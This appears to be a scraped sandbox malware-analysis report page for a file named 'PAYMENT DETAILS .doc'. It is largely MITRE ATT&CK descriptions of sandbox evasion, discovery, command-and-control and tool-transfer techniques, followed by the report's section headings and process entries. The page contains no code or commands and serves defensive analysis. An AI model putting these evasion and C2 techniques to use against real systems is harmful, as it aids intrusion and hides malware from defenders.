Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PAYMENT DETAILS .doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: WINWORD.EXE PID: 2304 Parent PID: 584

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1976 Parent PID: 584

General

Chronological Activities

Disassembly